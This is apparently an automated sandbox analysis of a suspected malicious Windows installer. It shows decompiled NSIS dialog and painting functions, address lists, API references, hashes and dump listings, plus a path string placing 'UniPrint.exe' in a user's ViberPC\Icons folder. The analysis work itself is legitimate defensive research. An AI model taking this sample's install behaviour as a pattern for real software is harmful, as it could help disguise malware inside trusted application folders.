								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									if((_t269 & 0x00000004) == 0) {
										 *( *0x420494 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x420494 + _t318 * 4) = _t274;
									_t288 =  *( *0x420494 + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_v24 = _t311;
						} while (_t318 <  *0x423ecc);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403F4D(_v8);
								_t280 = _v32;
								_t315 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403F4D(_v12);
								L89:
								return E00403F7F(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}



























































                                                                                                        0x00404871
                                                                                                        0x00404877
                                                                                                        0x00404879
                                                                                                        0x0040487f
                                                                                                        0x00404885
                                                                                                        0x00404892
                                                                                                        0x0040489b
                                                                                                        0x0040489e
                                                                                                        0x004048a1
                                                                                                        0x00404ac9
                                                                                                        0x00404ad0
                                                                                                        0x00404ae4
                                                                                                        0x00404ad2
                                                                                                        0x00404ad4
                                                                                                        0x00404ad7
                                                                                                        0x00404ad8
                                                                                                        0x00404adf
                                                                                                        0x00404adf
                                                                                                        0x00404af0
                                                                                                        0x00404afe
                                                                                                        0x00404b01
                                                                                                        0x00404b17
                                                                                                        0x00404b8f
                                                                                                        0x00404b92
                                                                                                        0x00404b94
                                                                                                        0x00404b9e
                                                                                                        0x00404bac
                                                                                                        0x00404bac
                                                                                                        0x00404bae
                                                                                                        0x00404bb8
                                                                                                        0x00404bbe
                                                                                                        0x00404bdf
                                                                                                        0x00404bc0
                                                                                                        0x00404bcd
                                                                                                        0x00404bcd
                                                                                                        0x00404bbe
                                                                                                        0x00404bb8
                                                                                                        0x00000000
                                                                                                        0x00404b92
                                                                                                        0x00404b1c
                                                                                                        0x00404b27
                                                                                                        0x00404b2c
                                                                                                        0x00404b33
                                                                                                        0x00404b3a
                                                                                                        0x00404b44
                                                                                                        0x00404b44
                                                                                                        0x00404b48
                                                                                                        0x00404b4d
                                                                                                        0x00404b52
                                                                                                        0x00404b68
                                                                                                        0x00404b54
                                                                                                        0x00404b54
                                                                                                        0x00404b5c
                                                                                                        0x00404b63
                                                                                                        0x00404b5e
                                                                                                        0x00404b5e
                                                                                                        0x00404b5e
                                                                                                        0x00404b5c
                                                                                                        0x00404b6c
                                                                                                        0x00404b6e
                                                                                                        0x00404b7c
                                                                                                        0x00404b7d
                                                                                                        0x00404b89
                                                                                                        0x00404b8c
                                                                                                        0x00404b8c
                                                                                                        0x00404b4d
                                                                                                        0x00000000
                                                                                                        0x00404b3a
                                                                                                        0x00404b1e
                                                                                                        0x00404b25
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00404be2
                                                                                                        0x00404be2
                                                                                                        0x00404be9
                                                                                                        0x00404c5d
                                                                                                        0x00404c64
                                                                                                        0x00404c70
                                                                                                        0x00404c70
                                                                                                        0x00404c79
                                                                                                        0x00404c7b
                                                                                                        0x00404c82
                                                                                                        0x00404c85
                                                                                                        0x00404c85
                                                                                                        0x00404c8b
                                                                                                        0x00404c92
                                                                                                        0x00404c95
                                                                                                        0x00404c95
                                                                                                        0x00404c9b
                                                                                                        0x00404ca1
                                                                                                        0x00404ca7
                                                                                                        0x00404ca7
                                                                                                        0x00404cb4
                                                                                                        0x00404e01
                                                                                                        0x00404e08
                                                                                                        0x00404e25
                                                                                                        0x00404e2b
                                                                                                        0x00404e3d
                                                                                                        0x00404e3d
                                                                                                        0x00000000
                                                                                                        0x00404cba
                                                                                                        0x00404cbc
                                                                                                        0x00404cc4
                                                                                                        0x00404cc8
                                                                                                        0x00404cc8
                                                                                                        0x00404cd0
                                                                                                        0x00404d11
                                                                                                        0x00404d13
                                                                                                        0x00404d23
                                                                                                        0x00404d26
                                                                                                        0x00404d2b
                                                                                                        0x00404d32
                                                                                                        0x00404d35
                                                                                                        0x00404dd7
                                                                                                        0x00404ddd
                                                                                                        0x00404deb
                                                                                                        0x00404dfc
                                                                                                        0x00404dfc
                                                                                                        0x00000000
                                                                                                        0x00404deb
                                                                                                        0x00404d3b
                                                                                                        0x00404d3e
                                                                                                        0x00404d44
                                                                                                        0x00404d49
                                                                                                        0x00404d4b
                                                                                                        0x00404d4d
                                                                                                        0x00404d53
                                                                                                        0x00404d5a
                                                                                                        0x00404d5f
                                                                                                        0x00404d66
                                                                                                        0x00404d69
                                                                                                        0x00404d69
                                                                                                        0x00404d70
                                                                                                        0x00404d7c
                                                                                                        0x00404d80
                                                                                                        0x00404d82
                                                                                                        0x00404d82
                                                                                                        0x00404d72
                                                                                                        0x00404d74
                                                                                                        0x00404d74
                                                                                                        0x00404da2
                                                                                                        0x00404dae
                                                                                                        0x00404dbd
                                                                                                        0x00404dbd
                                                                                                        0x00404dbf
                                                                                                        0x00404dc2
                                                                                                        0x00404dcb
                                                                                                        0x00000000
                                                                                                        0x00404cd2
                                                                                                        0x00404cdd
                                                                                                        0x00404ce0
                                                                                                        0x00404ce5
                                                                                                        0x00404ce7
                                                                                                        0x00404ceb
                                                                                                        0x00404cfb
                                                                                                        0x00404d05
                                                                                                        0x00404d07
                                                                                                        0x00404d0a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00404ced
                                                                                                        0x00404ced
                                                                                                        0x00404cf3
                                                                                                        0x00404cf5
                                                                                                        0x00404cf5
                                                                                                        0x00404cf6
                                                                                                        0x00404cf7
                                                                                                        0x00000000
                                                                                                        0x00404ced
                                                                                                        0x00404cd0
                                                                                                        0x00404cb4
                                                                                                        0x00404bf1
                                                                                                        0x00000000
                                                                                                        0x00404c07
                                                                                                        0x00404c11
                                                                                                        0x00404c16
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00404c28
                                                                                                        0x00404c2d
                                                                                                        0x00404c39
                                                                                                        0x00404c39
                                                                                                        0x00404c3b
                                                                                                        0x00404c4a
                                                                                                        0x00404c4c
                                                                                                        0x00404c53
                                                                                                        0x00404c56
                                                                                                        0x00000000
                                                                                                        0x00404c56
                                                                                                        0x00404bf1
                                                                                                        0x004048a7
                                                                                                        0x004048ac
                                                                                                        0x004048b6
                                                                                                        0x004048b7
                                                                                                        0x004048c0
                                                                                                        0x004048cb
                                                                                                        0x004048d6
                                                                                                        0x004048dc
                                                                                                        0x004048ea
                                                                                                        0x004048f0
                                                                                                        0x004048ff
                                                                                                        0x00404904
                                                                                                        0x0040490f
                                                                                                        0x00404918
                                                                                                        0x0040492d
                                                                                                        0x0040493e
                                                                                                        0x0040494b
                                                                                                        0x0040494b
                                                                                                        0x00404950
                                                                                                        0x00404956
                                                                                                        0x00404958
                                                                                                        0x0040495b
                                                                                                        0x00404960
                                                                                                        0x00404965
                                                                                                        0x00404967
                                                                                                        0x00404967
                                                                                                        0x00404987
                                                                                                        0x00404987
                                                                                                        0x00404989
                                                                                                        0x0040498a
                                                                                                        0x0040498f
                                                                                                        0x00404992
                                                                                                        0x00404995
                                                                                                        0x00404999
                                                                                                        0x0040499e
                                                                                                        0x004049a3
                                                                                                        0x004049a7
                                                                                                        0x004049ac
                                                                                                        0x004049b1
                                                                                                        0x004049b3
                                                                                                        0x004049bb
                                                                                                        0x00404a85
                                                                                                        0x00404a98
                                                                                                        0x00000000
                                                                                                        0x004049c1
                                                                                                        0x004049c4
                                                                                                        0x004049c7
                                                                                                        0x004049ca
                                                                                                        0x004049ca
                                                                                                        0x004049d0
                                                                                                        0x004049d6
                                                                                                        0x004049d9
                                                                                                        0x004049df
                                                                                                        0x004049e0
                                                                                                        0x004049e5
                                                                                                        0x004049ee
                                                                                                        0x004049f5
                                                                                                        0x004049f8
                                                                                                        0x004049fb
                                                                                                        0x004049fe
                                                                                                        0x00404a3a
                                                                                                        0x00404a63
                                                                                                        0x00404a3c
                                                                                                        0x00404a49
                                                                                                        0x00404a49
                                                                                                        0x00404a00
                                                                                                        0x00404a03
                                                                                                        0x00404a12
                                                                                                        0x00404a1c
                                                                                                        0x00404a24
                                                                                                        0x00404a2b
                                                                                                        0x00404a33
                                                                                                        0x00404a33
                                                                                                        0x004049fe
                                                                                                        0x00404a69
                                                                                                        0x00404a6a
                                                                                                        0x00404a76
                                                                                                        0x00404a76
                                                                                                        0x00404a83
                                                                                                        0x00404a9e
                                                                                                        0x00404aa2
                                                                                                        0x00404abf
                                                                                                        0x00404ac4
                                                                                                        0x00404ac7
                                                                                                        0x00000000
                                                                                                        0x00404aa4
                                                                                                        0x00404aa9
                                                                                                        0x00404ab2
                                                                                                        0x00404e3f
                                                                                                        0x00404e51
                                                                                                        0x00404e51
                                                                                                        0x00404aa2
                                                                                                        0x00000000
                                                                                                        0x00404a83
                                                                                                        0x004049bb

                                                                                                        APIs
                                                                                                        • GetDlgItem.USER32 ref: 0040486A
                                                                                                        • GetDlgItem.USER32 ref: 00404877
                                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 004048C3
                                                                                                        • LoadBitmapA.USER32 ref: 004048D6
                                                                                                        • SetWindowLongA.USER32 ref: 004048F0
                                                                                                        • 74191AB0.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404904
                                                                                                        • 741923B0.COMCTL32(00000000,?,00FF00FF), ref: 00404918
                                                                                                        • SendMessageA.USER32(?,00001109,00000002), ref: 0040492D
                                                                                                        • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404939
                                                                                                        • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 0040494B
                                                                                                        • DeleteObject.GDI32(?), ref: 00404950
                                                                                                        • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 0040497B
                                                                                                        • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404987
                                                                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A1C
                                                                                                        • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404A47
                                                                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A5B
                                                                                                        • GetWindowLongA.USER32 ref: 00404A8A
                                                                                                        • SetWindowLongA.USER32 ref: 00404A98
                                                                                                        • ShowWindow.USER32(?,00000005), ref: 00404AA9
                                                                                                        • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404BAC
                                                                                                        • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404C11
                                                                                                        • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404C26
                                                                                                        • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404C4A
                                                                                                        • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404C70
                                                                                                        • 74191F60.COMCTL32(?), ref: 00404C85
                                                                                                        • GlobalFree.KERNEL32 ref: 00404C95
                                                                                                        • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404D05
                                                                                                        • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404DAE
                                                                                                        • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404DBD
                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00404DDD
                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00404E2B
                                                                                                        • GetDlgItem.USER32 ref: 00404E36
                                                                                                        • ShowWindow.USER32(00000000), ref: 00404E3D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$Window$ItemLongShow$74191Global$741923AllocBitmapDeleteFreeInvalidateLoadObjectRect
                                                                                                        • String ID: $M$N
                                                                                                        • API String ID: 1539750561-813528018
                                                                                                        • Opcode ID: bc836f97d9874f4f727094095d6c382577d8705a5fdd7ffcfefc5c205b7b8112
                                                                                                        • Instruction ID: 91af9d563adbb526dddc39620d8b288a2aea1bcbb5731436b9e02a5cfbe7d22d
                                                                                                        • Opcode Fuzzy Hash: bc836f97d9874f4f727094095d6c382577d8705a5fdd7ffcfefc5c205b7b8112
                                                                                                        • Instruction Fuzzy Hash: AB029FB0E00209AFDB21DF54DD45AAE7BB5FB84315F10817AF610BA2E1C7799A42CF58
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00401000, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125nativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 81%
                                                                                                        			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				void* _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x423eb0;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x4236a0, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x423ea8;
				}
				return  *0x407248(_a4, _a8, _a12, _t102);
			}













                                                                                                        0x0040100a
                                                                                                        0x00401039
                                                                                                        0x00401047
                                                                                                        0x0040104d
                                                                                                        0x00401051
                                                                                                        0x0040105b
                                                                                                        0x00401061
                                                                                                        0x00401064
                                                                                                        0x004010f3
                                                                                                        0x00401089
                                                                                                        0x0040108c
                                                                                                        0x004010a6
                                                                                                        0x004010bd
                                                                                                        0x004010cc
                                                                                                        0x004010cf
                                                                                                        0x004010d5
                                                                                                        0x004010d9
                                                                                                        0x004010e4
                                                                                                        0x004010ed
                                                                                                        0x004010ef
                                                                                                        0x004010ef
                                                                                                        0x00401100
                                                                                                        0x00401105
                                                                                                        0x0040110d
                                                                                                        0x00401110
                                                                                                        0x00401112
                                                                                                        0x00401118
                                                                                                        0x0040111f
                                                                                                        0x00401126
                                                                                                        0x00401130
                                                                                                        0x00401142
                                                                                                        0x00401156
                                                                                                        0x00401160
                                                                                                        0x00401165
                                                                                                        0x00401165
                                                                                                        0x00401110
                                                                                                        0x0040116e
                                                                                                        0x00000000
                                                                                                        0x00401178
                                                                                                        0x00401010
                                                                                                        0x00401013
                                                                                                        0x00401015
                                                                                                        0x0040101f
                                                                                                        0x0040101f
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • NtdllDefWindowProc_A.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                        • GetClientRect.USER32 ref: 0040105B
                                                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                        • FillRect.USER32 ref: 004010E4
                                                                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                        • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                        • DrawTextA.USER32(00000000,004236A0,000000FF,00000010,00000820), ref: 00401156
                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeNtdllProc_Window
                                                                                                        • String ID: F
                                                                                                        • API String ID: 2222205020-1304234792
                                                                                                        • Opcode ID: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                                                                                                        • Instruction ID: 81477e3a2fde3fb3f26aa953fc06e347994717d76cab2c79682594c458f31f57
                                                                                                        • Opcode Fuzzy Hash: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                                                                                                        • Instruction Fuzzy Hash: 8141BC71804249AFCB058FA4CD459BFBFB9FF44314F00802AF551AA1A0C378EA54DFA5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00404356, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 266stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 75%
                                                                                                        			E00404356(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				struct HWND__* _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				void _v72;
				struct _browseinfo _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t81;
				long _t86;
				signed char* _t88;
				void* _t94;
				signed int _t95;
				signed short _t113;
				signed int _t117;
				struct _ITEMIDLIST* _t123;
				intOrPtr* _t139;
				signed int* _t146;
				signed int _t149;
				signed int _t154;
				struct HWND__* _t160;
				CHAR* _t163;
				int _t164;

				_t81 =  *0x41fc70;
				_v36 = _t81;
				_t163 = ( *(_t81 + 0x3c) << 0xa) + 0x424000;
				_v8 =  *((intOrPtr*)(_t81 + 0x38));
				if(_a8 == 0x40b) {
					E0040540B(0x3fb, _t163);
					E00405DC8(_t163);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040540B(0x3fb, _t163);
							if(E0040573A(_t181, _t163) == 0) {
								_v8 = 1;
							}
							E00405B66(0x41f468, _t163);
							_t146 = 0;
							_t86 = E00405E88(0);
							_v16 = _t86;
							if(_t86 == 0) {
								L31:
								E00405B66(0x41f468, _t163);
								_t88 = E004056ED(0x41f468);
								if(_t88 != _t146) {
									 *_t88 =  *_t88 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41f468,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
									_t154 = _a8;
									goto L37;
								} else {
									_t164 = 0x400;
									_t154 = MulDiv(_v20 * _v28, _v16, 0x400);
									_v12 = 1;
									goto L38;
								}
							} else {
								if(0 == 0x41f468) {
									L30:
									_t146 = 0;
									goto L31;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t113 = _v16(0x41f468,  &_v44,  &_v24,  &_v32);
									if(_t113 != 0) {
										break;
									}
									if(_t146 != 0) {
										 *_t146 =  *_t146 & _t113;
									}
									_t146 = E004056A0(_t113, 0x41f468) - 1;
									 *_t146 = 0x5c;
									if(_t146 != 0x41f468) {
										continue;
									} else {
										goto L30;
									}
								}
								_t154 = (_v40 << 0x00000020 | _v44) >> 0xa;
								_v12 = 1;
								_t146 = 0;
								L37:
								_t164 = 0x400;
								L38:
								_t94 = E004047A6(5);
								if(_v12 != _t146 && _t154 < _t94) {
									_v8 = 2;
								}
								if( *((intOrPtr*)( *0x42367c + 0x10)) != _t146) {
									E004046F1(0x3ff, 0xfffffffb, _t94);
									if(_v12 == _t146) {
										SetDlgItemTextA(_a4, _t164, 0x41f458);
									} else {
										E004046F1(_t164, 0xfffffffc, _t154);
									}
								}
								_t95 = _v8;
								 *0x423f44 = _t95;
								if(_t95 == _t146) {
									_v8 = E0040140B(7);
								}
								if(( *(_v36 + 0x14) & _t164) != 0) {
									_v8 = _t146;
								}
								E00403F3A(0 | _v8 == _t146);
								if(_v8 == _t146 &&  *0x42048c == _t146) {
									E004042EB();
								}
								 *0x42048c = _t146;
								goto L53;
							}
						}
						_t181 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t117 = _a12 & 0x0000ffff;
					if(_t117 != 0x3fb) {
						L12:
						if(_t117 == 0x3e9) {
							_t149 = 7;
							memset( &_v72, 0, _t149 << 2);
							_v76 = _a4;
							_v68 = 0x4204a0;
							_v56 = E0040468B;
							_v52 = _t163;
							_v64 = E00405B88(0x3fb, 0x4204a0, _t163, 0x41f870, _v8);
							_v60 = 0x41;
							_t123 = SHBrowseForFolder( &_v76);
							if(_t123 == 0) {
								_a8 = 0x40f;
							} else {
								E00405659( *0x407278(_t123), _t163);
								_t127 =  *((intOrPtr*)( *0x423eb0 + 0x11c));
								if( *((intOrPtr*)( *0x423eb0 + 0x11c)) != 0 && _t163 == "C:\\Users\\hardz\\AppData\\Roaming\\ViberPC\\Icons") {
									E00405B88(0x3fb, 0x4204a0, _t163, 0, _t127);
									_push(0x4204a0);
									_push(0x422e40);
									if( *0x4070f0() != 0) {
										_push(0x422e40);
										_push(_t163);
										L00405B82();
									}
								}
								 *0x42048c =  &(( *0x42048c)[0]);
								SetDlgItemTextA(_a4, 0x3fb, _t163);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t160 = _a4;
					_v12 = GetDlgItem(_t160, 0x3fb);
					if(E004056C6(_t163) != 0 && E004056ED(_t163) == 0) {
						E00405659(_t141, _t163);
					}
					 *0x423678 = _t160;
					SetWindowTextA(_v12, _t163);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403F18(_t160);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403F18(_t160);
					E00403F4D(_v12);
					_t139 = E00405E88(7);
					if(_t139 == 0) {
						L53:
						return E00403F7F(_a8, _a12, _a16);
					}
					 *_t139(_v12, 1);
					goto L8;
				}
			}






































                                                                                                        0x0040435c
                                                                                                        0x00404363
                                                                                                        0x0040436f
                                                                                                        0x0040437d
                                                                                                        0x00404385
                                                                                                        0x00404389
                                                                                                        0x0040438f
                                                                                                        0x0040438f
                                                                                                        0x0040439b
                                                                                                        0x0040440f
                                                                                                        0x00404416
                                                                                                        0x004044eb
                                                                                                        0x004044f2
                                                                                                        0x00404501
                                                                                                        0x00404501
                                                                                                        0x00404505
                                                                                                        0x0040450b
                                                                                                        0x00404518
                                                                                                        0x0040451a
                                                                                                        0x0040451a
                                                                                                        0x00404528
                                                                                                        0x0040452d
                                                                                                        0x00404530
                                                                                                        0x00404537
                                                                                                        0x0040453a
                                                                                                        0x00404571
                                                                                                        0x00404573
                                                                                                        0x00404579
                                                                                                        0x00404580
                                                                                                        0x00404582
                                                                                                        0x00404582
                                                                                                        0x0040459e
                                                                                                        0x004045da
                                                                                                        0x00000000
                                                                                                        0x004045a0
                                                                                                        0x004045a3
                                                                                                        0x004045b7
                                                                                                        0x004045b9
                                                                                                        0x00000000
                                                                                                        0x004045b9
                                                                                                        0x0040453c
                                                                                                        0x00404540
                                                                                                        0x0040456f
                                                                                                        0x0040456f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00404542
                                                                                                        0x00404542
                                                                                                        0x0040454f
                                                                                                        0x00404554
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00404558
                                                                                                        0x0040455a
                                                                                                        0x0040455a
                                                                                                        0x00404565
                                                                                                        0x00404568
                                                                                                        0x0040456d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040456d
                                                                                                        0x004045c8
                                                                                                        0x004045cf
                                                                                                        0x004045d6
                                                                                                        0x004045dd
                                                                                                        0x004045dd
                                                                                                        0x004045e2
                                                                                                        0x004045e4
                                                                                                        0x004045ec
                                                                                                        0x004045f2
                                                                                                        0x004045f2
                                                                                                        0x00404602
                                                                                                        0x0040460c
                                                                                                        0x00404614
                                                                                                        0x0040462a
                                                                                                        0x00404616
                                                                                                        0x0040461a
                                                                                                        0x0040461a
                                                                                                        0x00404614
                                                                                                        0x0040462f
                                                                                                        0x00404634
                                                                                                        0x00404639
                                                                                                        0x00404642
                                                                                                        0x00404642
                                                                                                        0x0040464b
                                                                                                        0x0040464d
                                                                                                        0x0040464d
                                                                                                        0x00404659
                                                                                                        0x00404661
                                                                                                        0x0040466b
                                                                                                        0x0040466b
                                                                                                        0x00404670
                                                                                                        0x00000000
                                                                                                        0x00404670
                                                                                                        0x0040453a
                                                                                                        0x004044f4
                                                                                                        0x004044fb
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004044fb
                                                                                                        0x0040441c
                                                                                                        0x00404422
                                                                                                        0x0040443c
                                                                                                        0x00404441
                                                                                                        0x0040444b
                                                                                                        0x00404452
                                                                                                        0x00404461
                                                                                                        0x00404464
                                                                                                        0x00404467
                                                                                                        0x0040446e
                                                                                                        0x00404476
                                                                                                        0x0040447d
                                                                                                        0x00404484
                                                                                                        0x0040448c
                                                                                                        0x004044e4
                                                                                                        0x0040448e
                                                                                                        0x00404496
                                                                                                        0x004044a0
                                                                                                        0x004044a8
                                                                                                        0x004044b5
                                                                                                        0x004044ba
                                                                                                        0x004044c0
                                                                                                        0x004044c9
                                                                                                        0x004044cb
                                                                                                        0x004044cc
                                                                                                        0x004044cd
                                                                                                        0x004044cd
                                                                                                        0x004044c9
                                                                                                        0x004044d2
                                                                                                        0x004044dd
                                                                                                        0x004044dd
                                                                                                        0x0040448c
                                                                                                        0x00000000
                                                                                                        0x00404441
                                                                                                        0x0040442f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00404435
                                                                                                        0x00000000
                                                                                                        0x0040439d
                                                                                                        0x0040439d
                                                                                                        0x004043a9
                                                                                                        0x004043b3
                                                                                                        0x004043c0
                                                                                                        0x004043c0
                                                                                                        0x004043c6
                                                                                                        0x004043cf
                                                                                                        0x004043d8
                                                                                                        0x004043db
                                                                                                        0x004043de
                                                                                                        0x004043e6
                                                                                                        0x004043e9
                                                                                                        0x004043ec
                                                                                                        0x004043f4
                                                                                                        0x004043fb
                                                                                                        0x00404402
                                                                                                        0x00404676
                                                                                                        0x00404688
                                                                                                        0x00404688
                                                                                                        0x0040440d
                                                                                                        0x00000000
                                                                                                        0x0040440d

                                                                                                        APIs
                                                                                                        • GetDlgItem.USER32 ref: 004043A2
                                                                                                        • SetWindowTextA.USER32(?,?), ref: 004043CF
                                                                                                        • SHBrowseForFolder.SHELL32(?), ref: 00404484
                                                                                                        • 74E3A680.OLE32(00000000), ref: 0040448F
                                                                                                        • lstrcmpi.KERNEL32 ref: 004044C1
                                                                                                        • lstrcat.KERNEL32(?, "C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe"), ref: 004044CD
                                                                                                        • SetDlgItemTextA.USER32 ref: 004044DD
